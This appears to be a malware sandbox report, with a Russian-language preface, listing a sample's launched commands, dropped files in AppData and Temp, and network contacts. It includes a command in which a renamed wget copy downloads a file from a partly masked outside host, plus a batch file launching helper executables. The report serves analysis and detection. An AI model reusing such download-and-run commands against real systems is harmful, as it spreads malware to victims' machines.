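Техническая информация
Примечание: подзаголовки разделов в этом фрагменте не сохранились. Судя по содержимому записей, ниже по порядку идут запускаемые команды, пути к файлам (три последних пути повторяются), сетевые обращения и параметры окна. Символы ### в имени узла, по-видимому, являются маскировкой, внесённой в самом отчёте, поэтому эти строки нельзя использовать как полный сетевой индикатор. Параметры в первой записи совпадают с опциями GNU Wget (например, -t 0, --retry-connrefused, --no-check-certificate), то есть под случайным именем файла, вероятно, запускается копия этой утилиты; при обнаружении надёжнее опираться на набор аргументов командной строки, чем на имя исполняемого файла.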
- <LS_APPDATA>\F8CF33AD986170E3D24561D4B8B8D76B.EXE -o F70130C44CDD00A372972E2323195E7A -d -t 0 --retry-connrefused -w 5 --random-wait --no-dns-cache --restrict-file-names=windows -nd -nH --no-cache --ignore-length --no-cookies --no-check-certificate --follow-ftp http://bt###cker.uk.to/affiliate/549683/adsvp.php
- %TEMP%\47helper.exe
- %TEMP%\install.exe r
- <SYSTEM32>\cmd.exe /c ""%WINDIR%\Temp\a00277.bat" "%TEMP%\\47helper.exe" "
- <SYSTEM32>\ntvdm.exe -f -i1
- <LS_APPDATA>\pcre3.dll
- <LS_APPDATA>\F8CF33AD986170E3D24561D4B8B8D76B.EXE
- <LS_APPDATA>\C907D7A30E7D43AFD00202154480A33A.EXE
- <LS_APPDATA>\adsvp.php
- <LS_APPDATA>\F70130C44CDD00A372972E2323195E7A
- %WINDIR%\Temp\a00277.bat
- <LS_APPDATA>\C0CA437737654CA667038D6B2C1B5D1E.EXE
- %WINDIR%\Temp\scs1.tmp
- %TEMP%\install.exe
- %TEMP%\359helper.exe
- %TEMP%\47helper.exe
- %TEMP%\115helper.exe
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\a00277.bat
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- 'bt###cker.uk.to':80
- bt###cker.uk.to/affiliate/549683/adsvp.php
- DNS ASK bt###cker.uk.to
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-9b8.9bc.370001'